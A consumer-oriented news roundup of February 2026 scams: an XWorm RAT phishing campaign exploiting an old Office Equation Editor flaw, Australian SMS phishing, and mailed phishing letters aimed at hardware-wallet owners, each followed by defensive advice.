Cybersecurity threats are evolving at a dizzying pace, and February 2026 has seen a wave of sophisticated scams targeting both individuals and businesses across the globe. From clever phishing emails and SMS messages to old-fashioned snail mail, attackers are using every trick in the book to steal sensitive information and compromise systems. Recent reports from security researchers and experts highlight the alarming creativity and persistence of these cybercriminals, reminding everyone that vigilance is more important than ever.
On February 16, 2026, security researchers sounded the alarm about a new cyber-espionage campaign that’s weaponizing a familiar foe: the XWorm Remote Access Trojan (RAT). According to Fortinet, this campaign isn’t just another run-of-the-mill malware outbreak. Instead, it’s a carefully orchestrated operation that combines business-style phishing emails with an old Microsoft Office vulnerability—CVE-2018-0802—to breach modern Windows systems.
The phishing emails are masterclasses in deception. They arrive in multiple languages, posing as purchase orders, shipment documents, or payment confirmations, and urge recipients to open a seemingly innocuous Excel add-in file. But opening that file is where the trouble begins. Hidden within is an Object Linking and Embedding (OLE) component, designed specifically to exploit the Equation Editor vulnerability. Once triggered, the attack chain is almost cinematic in its complexity: the document’s shellcode downloads an HTML Application (HTA) file, which then launches PowerShell to retrieve a disguised image file from the internet. Inside that image? A .NET malware module, encoded in Base64, which loads directly into memory—leaving barely a trace on the victim’s hard drive.
The final act is the deployment of XWorm version 7.2, delivered via a process hollowing technique that injects malicious code into a legitimate Msbuild.exe process. The result? Attackers gain full remote control of the compromised computer. They can surveil, steal files, deploy ransomware, or even launch distributed denial-of-service (DDoS) attacks at will. XWorm’s plugin architecture is particularly worrying, offering more than 50 optional modules for credential theft, browser data harvesting, unauthorized remote desktop access, and more. As Fortinet points out, “Even a single open document can give attackers complete control of a system within minutes.”
This campaign is a stark reminder of the dangers posed by legacy software components that remain unpatched. Despite being nearly a decade old, the Equation Editor flaw continues to be exploited because so many organizations have yet to update or disable outdated Office executables. Security experts urge organizations to disable legacy Office components, apply all available patches, and treat unexpected email attachments with a healthy dose of skepticism.
But email isn’t the only battleground. On February 17, 2026, cybersecurity experts in Australia issued fresh warnings about a surge in “smishing” attacks—phishing via SMS texts. As detailed by local news outlets and cybersecurity authorities, these smishing campaigns use deceptive text messages to trick people into handing over personal information or clicking malicious links that can infect their phones with malware. With mobile phones now an extension of daily life, scammers are exploiting SMS to spread their schemes far and wide.
Smishing, a blend of “phishing” and “SMS,” may sound like tech jargon, but it’s a real and growing threat. The messages impersonate trusted entities like Australia Post, DHL, banks, government agencies such as the Australian Taxation Office (ATO), and popular retailers. Common ploys include fake delivery notifications, fraud alerts, prize offers, and requests for sensitive information under the guise of urgent account issues. For example, a message might claim to be from Australia Post about a parcel delivery problem, urging the recipient to click a link. Others mimic banks or the ATO, warning of suspicious activity or recalculated taxable income and asking for personal details.
The scale of the threat is underscored by recent incidents: in 2023, UPS warned customers about smishing messages demanding payment before delivery; during the 2021 Tokyo Olympic Games, scammers used smishing to sell fake event tickets and steal banking information; and in the United States, attackers impersonated the Postal Service to harvest login credentials. Cybersecurity experts stress that opening a text message is generally safe, but clicking suspicious links or downloading attachments can spell disaster.
To reduce risk, users are advised to avoid clicking on links in unsolicited texts, never download attachments from unknown senders, and report suspicious messages as spam. Updating passwords, monitoring bank and credit card statements for unusual activity, and running malware scans with trusted antivirus software are also essential steps. If in doubt, authorities recommend reporting scams through official channels like Scamwatch and contacting your mobile provider.
Just when you thought phishing was a purely digital menace, scammers have turned to old-school tactics with a high-tech twist. In early February 2026, reports surfaced of physical phishing letters being mailed to owners of Trezor and Ledger hardware wallets—the gold standard for cold-storage cryptocurrency security. According to cybersecurity expert Dmitry Smilyanets, who highlighted the scam on X, these letters are disturbingly convincing. They feature authentic-looking branding, urgent language, and even advice to never share your seed phrase online—all before directing victims to do exactly that via a malicious website.
The letters claim to come from the support teams at Ledger or Trezor, warning of a “mandatory Authentication Check” or a “critical security update.” Recipients are urged to complete the process by scanning a QR code or visiting a website that closely mimics the official domain. Once there, they’re prompted to enter their 24-word recovery seed phrase. If the victim complies, attackers gain full control of the wallet and can drain all crypto assets in a flash.
What makes this campaign especially insidious is its reliance on data from previous breaches. For example, Ledger’s 2020 breach exposed over 270,000 customer details, including emails, phone numbers, and physical addresses. Scammers have also sent altered Ledger Nano X devices with embedded malware and fake letters from a supposed CEO urging users to migrate their funds. In 2023, hackers compromised Ledger’s Connect Kit software, leading to over $600,000 in stolen assets. These incidents show that historical data leaks and supply-chain attacks are fertile ground for new scams.
Security experts recommend a multi-pronged defense: always verify communications via official channels, never enter seed phrases online, avoid scanning QR codes from unsolicited mail, and store recovery phrases offline. Using two-factor authentication, monitoring for unusual wallet activity, and considering air-gapped or multi-signature wallets can further reduce risk. As the crypto community has learned, even offline communications can be weaponized. Staying skeptical and informed is the best safeguard against these evolving threats.
Across email, SMS, and even the mailbox, cybercriminals are adapting their tactics to exploit every possible weakness. Whether you’re a business user, a crypto investor, or just someone waiting for a package, the message is clear: verify, patch, and be wary of anything unexpected. In the digital age, a little skepticism can go a long way toward keeping your data—and your money—safe.